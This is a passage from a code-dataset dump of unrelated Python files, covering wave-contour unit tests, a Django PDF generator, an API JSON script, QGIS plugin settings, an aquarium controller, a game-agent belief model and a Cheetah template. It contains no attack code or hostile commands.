None, 0)\n\n # Define parameters.\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n #del shape, loc, scale\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n dist3 = LognormalDistribution(mu=mu, sigma=sigma)\n distributions = [dist1, dist2, dist3]\n dependencies = [dep1, dep2, dep3]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n test_contour_IForm = IFormContour(mul_dist, 50, 3, 400)\n\n def test_isorm2d_WL(self):\n \"\"\"\n ISORM contour with Vanem2012 model.\n\n The used probabilistic model is described in Vanem and Bitner-Gregersen\n (2012), DOI: 10.1016/j.apor.2012.05.006\n \"\"\"\n\n # Define dependency tuple\n dep1 = (None, None, None)\n dep2 = (0, None, 0)\n\n # Define parameters\n shape = ConstantParam(1.471)\n loc = ConstantParam(0.8888)\n scale = ConstantParam(2.776)\n par1 = (shape, loc, scale)\n\n mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n\n # Create distributions\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n test_contour_isorm = ISormContour(mul_dist, 50, 3, 50)\n\n calculated_coordinates = pd.DataFrame({'x': test_contour_isorm.coordinates[0][0],\n 'y': test_contour_isorm.coordinates[0][1]})\n\n true_coordinates = pd.read_csv(testfiles_path + \"/isorm2dWL_coordinates.csv\")\n for o, p in [(o, p) for o in true_coordinates.index for p in true_coordinates.columns]:\n self.assertAlmostEqual(calculated_coordinates.loc[o, p], true_coordinates.loc[o, p], places=8)\n\n\nclass HDCTest(unittest.TestCase):\n\n def _setup(self,\n limits=[(0, 20), (0, 20)],\n deltas=[0.05, 0.05],\n n_years = 25,\n dep1=(None, None, None),\n dep2=(0, None, 0),\n par1=(ConstantParam(1.471), ConstantParam(0.8888),\n ConstantParam(2.776)),\n par2=(FunctionParam('exp3', 0.0400, 0.1748, -0.2243), None,\n FunctionParam('power3', 0.1, 1.489, 0.1901))\n ):\n \"\"\"\n Creating a contour (same as in DOI: 10.1016/j.coastaleng.2017.03.002).\n \"\"\"\n\n self.limits = limits\n self.deltas = deltas\n self.n_years = n_years\n\n # Define dependency tuple.\n self.dep1 = dep1\n self.dep2 = dep2\n\n # Define parameters.\n self.par1 = par1\n self.par2 = par2\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(*par2)\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Compute contour.\n test_contour_HDC = HighestDensityContour(mul_dist, n_years, 3,\n limits, deltas)\n return test_contour_HDC\n\n\n def test_cumsum(self):\n \"\"\"\n Tests if the return values of cumsum_biggest_until are correct.\n \"\"\"\n\n test_contour_HDC = self._setup()\n data_example = np.array([[80, 7, 20, 40], [1, 9, 45, 23]])\n\n summed_fields = test_contour_HDC.cumsum_biggest_until(data_example,\n 165.0)[0]\n last_summed = test_contour_HDC.cumsum_biggest_until(data_example,\n 165.0)[1]\n np.testing.assert_array_equal(summed_fields,\n ([[1, 0, 0, 1], [0, 0, 1, 0]]),\n 'cumsum calculates wrong summed_fields')\n self.assertEqual(last_summed, 40, 'cumsum gives wrong last_summed')\n\n\n def test_cumsum_nan_entry(self):\n \"\"\"\n Tests if ValueError is raised when the array has a 'nan' entry.\n \"\"\"\n\n test_contour_HDC = self._setup()\n data_example_nan = np.array([[80, 7, float('nan'), 40], [1, 9, 45, 23]])\n with self.assertRaises(ValueError):\n test_contour_HDC.cumsum_biggest_until(data_example_nan, 500.0)\n\n\n def test_setup_HDC_deltas_single(self):\n \"\"\"\n Tests if contour is created with a single float for deltas\n as the exception should handle.\n \"\"\"\n\n try:\n self._setup(deltas=0.05)\n\n except:\n print(\"contour couldn't be calculated\")\n\n\n def test_setup_HDC_deltas_none(self):\n \"\"\"\n Tests error when length of deltas is not equal with number of dimensions.\n \"\"\"\n\n test_contour_HDC = self._setup(deltas=None)\n self.assertEqual(test_contour_HDC.deltas, [0.5] *\n test_contour_HDC.distribution.n_dim)\n\n\n def test_setup_HDC_deltas_value(self):\n \"\"\"\n Tests error when length of deltas is not equal with number of dimensions.\n \"\"\"\n\n with self.assertRaises(ValueError):\n self._setup(deltas=[0.05, 0.05, 0.05])\n\n\n def test_setup_HDC_limits_length(self):\n \"\"\"\n Tests error when length of limits is not equal with number of dimensions.\n \"\"\"\n\n with self.assertRaises(ValueError):\n self._setup(limits=[(0, 20), (0, 20), (0, 20)])\n\n\n def test_setup_HDC_limits_none(self):\n \"\"\"\n Tests error when length of limits is not equal with number of dimensions.\n \"\"\"\n with self.assertWarns(RuntimeWarning):\n test_contour_HDC = self._setup(limits=None)\n self.assertEqual(test_contour_HDC.limits,\n [(0, 10)] * test_contour_HDC.distribution.n_dim)\n\n\n def test_setup_HDC_limits_Tuple_length(self):\n \"\"\"\n Tests error when length of limits_tuples is not two.\n \"\"\"\n\n with self.assertRaises(ValueError):\n self._setup(limits=[(0, 20), (20)])\n\n\n with self.assertRaises(ValueError):\n self._setup(limits=[(0, 20, 1), (0, 20)])\n\n\n# This is commented out as it does not ensure that the sorting algorithm\n# functions as intended.\n # def test_sort_coordinates(self):\n # \"\"\"\n # Sorts the points of a highest density contour and plots them.\n # \"\"\"\n #\n # # Define dependency tuple.\n # dep1 = (None, None, None)\n # dep2 = (0, None, 0)\n #\n # # Define parameters.\n # shape = ConstantParam(1.471)\n # loc = ConstantParam(0.8888)\n # scale = ConstantParam(2.776)\n # par1 = (shape, loc, scale)\n #\n # mu = FunctionParam('power3', 0.1000, 1.489, 0.1901)\n # sigma = FunctionParam('exp3', 0.0400, 0.1748, -0.2243)\n #\n # # Create distributions.\n # dist1 = WeibullDistribution(*par1)\n # dist2 = LognormalDistribution(mu=mu, sigma=sigma)\n #\n # distributions = [dist1, dist2]\n # dependencies = [dep1, dep2]\n #\n # mul_dist = MultivariateDistribution(distributions, dependencies)\n #\n # # Compute highest density contours with return periods of 1 and 20 years.\n # return_period_1 = 1\n # ts = 1 # Sea state duration in hours.\n # limits = [(0, 20), (0, 20)] # Limits of the computational domain.\n # deltas = [0.5, 0.5] # Dimensions of the grid cells.\n # hdc = HighestDensityContour(mul_dist, return_period_1, ts, limits, deltas)\n # c_unsorted = hdc.coordinates\n #\n # # Sort the coordinates.\n # c_sorted = sort_points_to_form_continous_line(c_unsorted[0][0],\n # c_unsorted[0][1],\n # do_search_for_optimal_start=True)\n #\n # # Plot the sorted and unsorted contours.\n # fig = plt.figure(figsize=(10, 5), dpi=150)\n # ax1 = fig.add_subplot(121)\n # plot_contour(x=c_unsorted[0][0],\n # y=c_unsorted[0][1],\n # ax=ax1,\n # contour_label=str(return_period_1) + '-yr contour',\n # line_style='b-')\n # ax1.title.set_text('Unsorted')\n # ax2 = fig.add_subplot(122)\n # plot_contour(x=c_sorted[0],\n # y=c_sorted[1],\n # ax=ax2,\n # contour_label=str(return_period_1) + '-yr contour',\n # line_style='b-')\n # ax2.title.set_text('Sorted')\n # #plt.show()\n\nclass DirectSamplingTest(unittest.TestCase):\n def _setup(self,\n dep1=(None, None, None),\n dep2=(0, None, 0),\n par1=(ConstantParam(1.471), ConstantParam(0.8888),\n ConstantParam(2.776)),\n par2=(FunctionParam('exp3', 0.0400, 0.1748, -0.2243), None,\n FunctionParam('power3', 0.1, 1.489, 0.1901))\n ):\n \"\"\"\n Creating contour.\n \"\"\"\n # Define dependency tuple.\n self.dep1 = dep1\n self.dep2 = dep2\n\n # Define parameters.\n self.par1 = par1\n self.par2 = par2\n\n # Create distributions.\n dist1 = WeibullDistribution(*par1)\n dist2 = LognormalDistribution(sigma=par2[0], mu=par2[2])\n\n distributions = [dist1, dist2]\n dependencies = [dep1, dep2]\n\n mul_dist = MultivariateDistribution(distributions, dependencies)\n\n # Calculate contour\n dsc = DirectSamplingContour(mul_dist, 10000000, 25, 6, 6)\n test_contour_dsc = dsc.direct_sampling_contour()\n return test_contour_dsc\n\n def test_contour(self):\n test_contour_dsc = self._setup()\n ref_contour = ([13.68, 13.68, 13.63, 13.63, 13.57, 13.45, 13.47, 13.43, 13.41, 13.22, 13.45, 13.21, 13.32,\n 13.44, 13.17, 13.12, 12.97, 12.99, 13.26, 13.05, 12.87, 12.77, 12.60, 12.18, 10.17, 3.39],\n [12.41, 13.57, 13.99, 13.99, 14.17, 14.44, 14.40, 14.46, 14.49, 14.66, 14.49, 14.63, 14.58,\n 14.54, 14.60, 14.60, 14.60, 14.60, 14.66, 14.59, 14.51, 14.46, 14.33, 13.96, 12.33, 2.24])\n\n for i in test_contour_dsc:\n for j in i:\n assert j < 15\n for i in test_contour_dsc[1]:\n assert i > 2\n assert test_contour_dsc[1][12], test_contour_dsc[1][13]\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_contours.py","file_name":"test_contours.py","file_ext":"py","file_size_in_byte":26285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"83584620","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\nimport subprocess\nimport codecs\nimport os\nimport sys\n\n# Create your models here.\n\nclass PDF():\n def __init__(self, file_id, revision, body, size, orientation, template):\n self.filename = file_id + \"_\" + revision + \"_\" + self.calc_md5msg(body)\n\n #(drive, tail) = os.path.splitdrive(__file__)\n self.path = \"./data/\"\n self.input = self.path + self.filename + \".html\"\n self.middle = self.path + self.filename + \"_tmp.pdf\"\n self.output = self.path + self.filename + \".pdf\"\n self.paper_size = size\n self.orientation = orientation\n self.template = template\n self.body = self.set_header() + body + self.set_footer()\n self.liquid_templates = {\"tate1\", \"tate2\", \"yoko1\", \"yoko2\"}\n return\n\n def get_filename(self) :\n return self.filename\n \n def calc_md5msg(self, body) :\n import hashlib\n tmp = body[0:1024].encode('utf-8')\n return hashlib.md5(tmp).hexdigest()\n\n def set_header(self) :\n header = \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"\\n\" \\\n + \"
        \\n\"\n\n # \"\\n\" \\\n return header\n\n def set_footer(self) :\n footer = \"
        \\n\\n\\n\"\n return footer\n\n def forme_body(self, body) :\n import re\n formed_body = re.sub(r'', '', body, re.MULTILINE | re.DOTALL)\n return formed_body\n\n def create_pdf(self):\n with codecs.open(self.input, \"w\", \"UTF-8\") as file :\n file.write(self.body)\n file.flush()\n\n wkhtml2pdf_cmd = \"\"\n if self.template in self.liquid_templates :\n wkhtml2pdf_cmd = \"wkhtmltopdf --enable-smart-shrinking --load-error-handling ignore --margin-top 20 --margin-right 0 --margin-bottom 0 --margin-left 40 --orientation \" + self.orientation + \" --print-media-type -s \" + self.paper_size + \" \" + self.input + \" \" + self.middle\n else :\n wkhtml2pdf_cmd = \"wkhtmltopdf --disable-smart-shrinking --load-error-handling ignore --margin-top 0 --margin-right 0 --margin-bottom 0 --margin-left 0 --orientation \" + self.orientation + \" --print-media-type -s \" + self.paper_size + \" \" + self.input + \" \" + self.middle\n\n if subprocess.check_call(wkhtml2pdf_cmd, shell=True) != 0 :\n return False\n \n pdf_tk_cmd = \"pdftk \" + self.middle + \" cat 1 output \" + self.output\n if subprocess.check_call(pdf_tk_cmd, shell=True) != 0 :\n return False\n\n os.remove(self.middle)\n return True\n\n def delete_old_pdf(self, old_filename) :\n old_pdf = self.path + old_filename + \".pdf\"\n old_html = self.path + old_filename + \".html\"\n os.remove(old_pdf)\n os.remove(old_html)\n return\n","sub_path":"postex/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"42678467","text":"#!/usr/bin/env python3\nimport json\nimport re\nimport os\n\ndir = '/home/attunity/airflow/LitmosAPI/files/'\n\n\nwith open(dir + 'course_module_session_detail.json', mode='w', encoding='utf-8') as f: json.dump([], f)\n\n\ndef jprint(obj):\n text = json.dumps(obj, sort_keys=True, indent=4)\n print(text)\n\n\nwith open(dir + 'course_module_session.json', 'r') as json_file:\n data = json.loads(json_file.read())\n\n\njson_selected = {}\n\n\nfor json_selected in data:\n json_selected = {k: json_selected[k] for k in ('CourseId', 'ModuleId', 'Id', 'Name',\n 'InstructorUserId', 'InstructorName',\n 'SessionType', 'TimeZone', 'Location', 'LocationId',\n 'StartDate', 'EndDate', 'CourseName', 'ModuleName',\n 'Slots', 'Accepted', 'EnableWaitList', 'LoadDateTime'\n )}\n with open(dir + 'course_module_session_detail.json', mode='a', encoding='utf-8') as fa:\n json.dump(json_selected, fa, indent=4);\n\n\n# FORMATTING\nwith open(dir + 'course_module_session_detail.json', 'r') as json_file:\n formatted = re.sub(r'(?!^|.$)\\[*\\]*', '', json_file.read()).replace('[{', '[' + '\\n{').replace('}{', '},' + '\\n{')+'\\n]'\nwith open(dir + 'course_module_session_detail.json', mode='w', encoding='utf-8') as fa:\n fa.write(formatted)","sub_path":"API_CourseModuleSession.py","file_name":"API_CourseModuleSession.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"323191151","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n ARKspatial\n A QGIS plugin for Archaeological Recording.\n Part of the Archaeological Recording Kit by L - P : Archaeology\n http://ark.lparchaeology.com\n -------------------\n copyright : 2017 by L - P : Heritage LLP\n email : ark@lparchaeology.com\n copyright : 2017 by John Layt\n email : john@layt.net\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\"\"\"\n\nfrom qgis.core import QGis\n\nfrom ..project import Project\n\nfrom collection_field_settings import CollectionFieldSettings\n\n\nclass CollectionLayerSettings:\n\n def __init__(self):\n self.layer = ''\n self.crs = ''\n self.geometry = QGis.NoGeometry\n self.multi = False\n self.label = ''\n self.name = ''\n self.fields = []\n self.path = ''\n self.stylePath = ''\n self.bufferLayer = False\n self.bufferName = ''\n self.bufferPath = ''\n self.logLayer = False\n self.logName = ''\n self.logPath = ''\n\n @staticmethod\n def fromArray(config):\n settings = CollectionLayerSettings()\n settings.layer = config['layer']\n settings.crs = config['crs']\n settings.geometry = config['geometry']\n settings.multi = config['multi']\n settings.label = config['label']\n settings.name = config['name']\n settings.path = config['path']\n settings.stylePath = config['stylePath']\n settings.bufferLayer = config['buffer']\n settings.bufferName = config['bufferName']\n settings.bufferPath = config['bufferPath']\n settings.logLayer = config['log']\n settings.logName = config['logName']\n settings.logPath = config['logPath']\n for field in config['fields']:\n settings.fields.append(CollectionFieldSettings.fromArray(field))\n return settings\n\n @staticmethod\n def fromProject(scope, path, layer):\n settings = CollectionLayerSettings()\n settings.layer = layer\n path = path + layer + '/'\n settings.label = Project.readEntry(scope, path + 'label')\n settings.name = Project.readEntry(scope, path + 'name')\n settings.path = Project.readEntry(scope, path + 'path')\n settings.bufferLayer = Project.readBoolEntry(scope, path + 'bufferLayer')\n settings.bufferName = Project.readEntry(scope, path + 'bufferName')\n settings.bufferPath = Project.readEntry(scope, path + 'bufferPath')\n settings.logLayer = Project.readBoolEntry(scope, path + 'logLayer')\n settings.logName = Project.readEntry(scope, path + 'logName')\n settings.logPath = Project.readEntry(scope, path + 'logPath')\n fields = Project.readListEntry(scope, path + 'fields')\n for field in fields:\n settings.fields[field] = CollectionFieldSettings.fromProject(scope, path, field)\n\n def toProject(self, scope, path):\n path = path + self.layer + '/'\n Project.writeEntry(scope, path + 'label', self.label)\n Project.writeEntry(scope, path + 'name', self.name)\n Project.writeEntry(scope, path + 'path', self.path)\n Project.writeEntry(scope, path + 'bufferLayer', self.bufferLayer)\n Project.writeEntry(scope, path + 'bufferName', self.bufferName)\n Project.writeEntry(scope, path + 'bufferPath', self.bufferPath)\n Project.writeEntry(scope, path + 'logLayer', self.logLayer)\n Project.writeEntry(scope, path + 'logName', self.logName)\n Project.writeEntry(scope, path + 'logPath', self.logPath)\n for field in self.fields:\n field.toProject(scope, path)\n","sub_path":"ark/lib/core/collection_layer_settings.py","file_name":"collection_layer_settings.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"502784946","text":"#!/usr/bin/python3\nimport os\n\nfrom pid import PidFile\n\n# set this path to folder where is AquariumComputer scripts installed\nos.chdir('/home/pi/AquariumComputer.Scripts')\n\nfrom basic_utils import *\nfrom errors import *\nfrom constants import *\n\nfrom modules.StatisticsModule import *\nfrom modules.SettingsModule import *\nfrom modules.ErrorModule import *\nfrom modules.OutputModule import *\nfrom modules.InputModule import *\nfrom modules.TemperatureModule import *\nfrom modules.AtoModule import *\n\nfrom modules.TimerModule import *\nfrom modules.MaintenanceModule import *\nfrom modules.LiveModule import *\nfrom modules.EmailModule import *\nfrom modules.LoggingModule import *\nfrom modules.ManualOverrideModule import *\nfrom modules.DatabaseModule import *\n#from DisplayModule import *\n\ndef main():\n loggingModule = LoggingModule(LOGGING_SETTING_FILE)\n loggingModule.Debug('Main script started...')\n\n try:\n emailModule.SendInfoEmail(\"Skrypt zostal uruchomiony\")\n except:\n loggingModule.Error(\"Error sending e-mail\")\n\n settingsModule = SettingsModule()\n settingsModule.ReadSettings(SETTINGS_FILE)\n settingsModule.ReadAtoSettings(ATO_SETTINGS_FILE)\n settingsModule.ReadTimerSettings(TIMER_SETTINGS_FILE)\n settingsModule.ReadPowerBarSettings(POWERBAR_SETTINGS_FILE)\n settingsModule.ReadMaintenanceSettings(MAINTENANCE_SETTINGS_FILE)\n settingsModule.ReadLiveSettings(LIVE_SETTINGS_FILE)\n settingsModule.ReadErrorSettings(ERROR_SETTINGS_FILE)\n settingsModule.ReadEmailSettings(EMAIL_SETTINGS_FILE)\n\n databaseModule = DatabaseModule(loggingModule)\n emailModule = EmailModule(settingsModule, loggingModule)\n errorModule = ErrorModule(settingsModule, emailModule)\n statisticsModule = StatisticsModule(databaseModule)\n outputModule = OutputModule(settingsModule, loggingModule, errorModule)\n inputModule = InputModule(loggingModule)\n atoModule = AtoModule(settingsModule, outputModule, statisticsModule, inputModule, errorModule, loggingModule)\n tempModule = TemperatureModule(settingsModule, outputModule, statisticsModule, errorModule, loggingModule, databaseModule)\n timerModule = TimerModule(settingsModule, outputModule, errorModule, loggingModule)\n maintenanceModule = MaintenanceModule(settingsModule, outputModule, errorModule, loggingModule)\n liveModule = LiveModule(settingsModule)\n manualOverrideModule = ManualOverrideModule(settingsModule, outputModule, errorModule, loggingModule)\n\n loggingModule.Debug(\"Main script initialization done.\")\n\n #displayModule = DisplayModule()\n\n try:\n # glowna petla programu\n while True:\n try:\n liveModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Live: {}\".format(sys.exc_info()))\n \n try:\n tempModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Temperature: {}\".format(sys.exc_info()))\n \n try:\n atoModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Ato: {}\".format(sys.exc_info()))\n \n try:\n timerModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Timer: {}\".format(sys.exc_info()))\n \n try:\n maintenanceModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Maintenance: {}\".format(sys.exc_info()))\n \n try:\n errorModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Error: {}\".format(sys.exc_info()))\n \n try:\n manualOverrideModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Manual override: {}\".format(sys.exc_info()))\n \n try:\n outputModule.UpdateOutputPins()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Output: {}\".format(sys.exc_info()))\n\n #displayModule.RefreshDisplay()\n\n time.sleep(0.5)\n\n except KeyboardInterrupt:\n emailModule.SendInfoEmail(\"Skrypt zostal zatrzymany\")\n\n loggingModule.Error(\"Main script interrupted from keyboard\")\n\n liveModule.Stop()\n GPIO.cleanup()\n\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd: {0}\".format(sys.exc_info()))\n\n loggingModule.Critical(\"Unexpected error: {0}\".format(sys.exc_info()))\n \n loggingModule.Exception('Got exception on main handler')\n \n liveModule.Stop()\n GPIO.cleanup()\n\n raise\n\nif __name__ == \"__main__\":\n with PidFile('AquariumComputer') as p:\n main()","sub_path":"AquariumComputerMain.py","file_name":"AquariumComputerMain.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"155311547","text":"\"\"\"\nContains the information to implement HBA such as move history and posterior beliefs.\nEdward Stevinson\n\"\"\"\nfrom agents.max_disk_agent import MaxDiskAgent\nfrom agents.max_value_agent import MaxValueAgent\nfrom agents.mobility_agent import MobilityAgent\nimport numpy as np\n\nclass Workspace:\n # Everything currently set for HBA with two types\n \n def __init__(self):\n # Create each of the possible types\n self.type1 = MaxDiskAgent()\n self.type2 = MaxValueAgent()\n self.type3 = MobilityAgent()\n # Create a 2D prob_history\n self.prob_history = [] \n self.prob_history.append([])\n self.prob_history.append([])\n self.prob_history.append([]) \n # Create W.Str \n self.create_opp_strategies()\n self.prior = [1/3, 1/3, 1/3] # Create Prior\n self.posterior = [1/3, 1/3, 1/3] #self.prior # Create Posterior beliefs \n \n def update_iteration(self, state, lastAction):\n # Extend probability history\n self.extend_prob_history(lastAction)\n # Update posterior beliefs\n self.update_posteriors()\n # Get opp_strategies # This not done here as state already updated for the move in interest\n # self.opp_strategies = self.update_opp_strategies(state)\n \n \n def update_posteriors(self):\n \"\"\"On each turn update posterior beliefs\"\"\"\n l = self.likelihood_gtw()\n # Calculate posterior\n # Multiply the prior and likelihood\n like = []\n like.append(l[0]*self.prior[0])\n like.append(l[1]*self.prior[1])\n like.append(l[2]*self.prior[2]) \n # Create normalising constant\n summ = like[0] + like[1] + like[2]\n # Create posterior \n a = like[0]/summ \n b = like[1]/summ \n c = like[2]/summ\n self.posterior[0] = a \n self.posterior[1] = b \n self.posterior[2] = c\n \n def likelihood_gtw(self):\n \"\"\"Method that specifies how evidence accounted for (acts upon prob_history)\n Returns... \"\"\"\n # index of last entry\n t = len(self.prob_history[0]) - 1\n prob_array = np.asarray(self.prob_history)\n #\n a = []\n for i in range (t, -1, -1):\n a.append(i)\n if not a: # For the first iteration\n a.append(0)\n b = np.asarray(a)\n c = np.power(b, 5) # These variables affect the drop off rate\n d = c * 0.01\n w = np.subtract(10, d) \n #\n e = np.greater(w,0)\n w = e * w\n # Turn prob_history into matrix\n \n # Matrix multiply H and transpose(w)\n f = np.transpose(w)\n l_mat = np.dot(prob_array, f)\n l = l_mat.tolist()\n \n ###\n #a = self.prob_history[0][t]\n #b = self.prob_history[1][t]\n #c = self.prob_history[2][t]\n #l = [a,b,c]\n return l\n \n def create_opp_strategies(self):\n \"\"\"Initialise W.Str\"\"\"\n # Create 2D list\n self.opp_strategies = []\n self.opp_strategies.append([]) \n self.opp_strategies.append([])\n self.opp_strategies.append([])\n \n def update_opp_strategies(self, state, legal_moves):\n \"\"\"Return what moves the opponent would make (Equivalent to W.Str)\n Note that often there will be multiple moves per turn\"\"\"\n # Fill the list with the possible moves\n self.opp_strategies[0] = self.type1.get_all_actions(state, legal_moves)\n self.opp_strategies[1] = self.type2.get_all_actions(state, legal_moves)\n self.opp_strategies[2] = self.type3.get_all_actions(state, legal_moves)\n \n def extend_prob_history(self, lastAction):\n \"\"\"Update prob_history\"\"\"\n # lastAction is opposition's action from the last turn\n # Iterate for each type\n for i in (0,1,2):\n \n if not lastAction: # For the case when opposition had no moves in the past stage\n self.prob_history[0].append(1)\n self.prob_history[1].append(1)\n self.prob_history[2].append(1)\n break\n \n if not self.opp_strategies[i]: # For the case when this type had no possible actions in the past stage\n self.prob_history[i].append(0)\n \n # If action matches that which the type would have made make it 1, else 0\n if lastAction in self.opp_strategies[i]: \n self.prob_history[i].append(1)\n else:\n self.prob_history[i].append(0)\n\n \n ","sub_path":"PYTHON/game/workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"498289722","text":"#!/usr/bin/env python\n\n\n\n\n##################################################\n## DEPENDENCIES\nimport sys\nimport os\nimport os.path\nimport __builtin__\nfrom os.path import getmtime, exists\nimport time\nimport types\nfrom Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion\nfrom Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple\nfrom Cheetah.Template import Template\nfrom Cheetah.DummyTransaction import *\nfrom Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList\nfrom Cheetah.CacheRegion import CacheRegion\nimport Cheetah.Filters as Filters\nimport Cheetah.ErrorCatchers as ErrorCatchers\nfrom io360.includes.urls import links\n\n##################################################\n## MODULE CONSTANTS\nVFFSL=valueFromFrameOrSearchList\nVFSL=valueFromSearchList\nVFN=valueForName\ncurrentTime=time.time\n__CHEETAH_version__ = '2.4.1'\n__CHEETAH_versionTuple__ = (2, 4, 1, 'final', 0)\n__CHEETAH_genTime__ = 1266283030.253588\n__CHEETAH_genTimestamp__ = 'Mon Feb 15 17:17:10 2010'\n__CHEETAH_src__ = 'site.tmpl'\n__CHEETAH_srcLastModified__ = 'Mon Aug 10 21:09:04 2009'\n__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'\n\nif __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:\n raise AssertionError(\n 'This template was compiled with Cheetah version'\n ' %s. Templates compiled before version %s must be recompiled.'%(\n __CHEETAH_version__, RequiredCheetahVersion))\n\n##################################################\n## CLASSES\n\nclass site(Template):\n\n ##################################################\n ## CHEETAH GENERATED METHODS\n\n\n def __init__(self, *args, **KWs):\n\n super(site, self).__init__(*args, **KWs)\n if not self._CHEETAH__instanceInitialized:\n cheetahKWArgs = {}\n allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()\n for k,v in KWs.items():\n if k in allowedKWs: cheetahKWArgs[k] = v\n self._initCheetahInstance(**cheetahKWArgs)\n \n\n def scripts(self, **KWS):\n\n\n\n ## CHEETAH: generated from #block scripts at line 8, col 1.\n trans = KWS.get(\"trans\")\n if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):\n trans = self.transaction # is None unless self.awake() was called\n if not trans:\n trans = DummyTransaction()\n _dummyTrans = True\n else: _dummyTrans = False\n write = trans.response().write\n SL = self._CHEETAH__searchList\n _filter = self._CHEETAH__currentFilter\n \n ########################################\n ## START - generated method body\n \n \n ########################################\n ## END - generated method body\n \n return _dummyTrans and trans.response().getvalue() or \"\"\n \n\n def style(self, **KWS):\n\n\n\n ## CHEETAH: generated from #block style at line 11, col 1.\n trans = KWS.get(\"trans\")\n if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):\n trans = self.transaction # is None unless self.awake() was called\n if not trans:\n trans = DummyTransaction()\n _dummyTrans = True\n else: _dummyTrans = False\n write = trans.response().write\n SL = self._CHEETAH__searchList\n _filter = self._CHEETAH__currentFilter\n \n ########################################\n ## START - generated method body\n \n \n ########################################\n ## END - generated method body\n \n return _dummyTrans and trans.response().getvalue() or \"\"\n \n\n def body(self, **KWS):\n\n\n\n ## CHEETAH: generated from #block body at line 20, col 1.\n trans = KWS.get(\"trans\")\n if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):\n trans = self.transaction # is None unless self.awake() was called\n if not trans:\n trans = DummyTransaction()\n _dummyTrans = True\n else: _dummyTrans = False\n write = trans.response().write\n SL = self._CHEETAH__searchList\n _filter = self._CHEETAH__currentFilter\n \n ########################################\n ## START - generated method body\n \n \n ########################################\n ## END - generated method body\n \n return _dummyTrans and trans.response().getvalue() or \"\"\n \n\n def respond(self, trans=None):\n\n\n\n ## CHEETAH: main method generated for this template\n if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):\n trans = self.transaction # is None unless self.awake() was called\n if not trans:\n trans = DummyTransaction()\n _dummyTrans = True\n else: _dummyTrans = False\n write = trans.response().write\n SL = self._CHEETAH__searchList\n _filter = self._CHEETAH__currentFilter\n \n ########################################\n ## START - generated method body\n \n write(u'''\n\n\n\n\nio360\n''')\n self.scripts(trans=trans)\n write(u'''\n\n\n\n\n

        io360

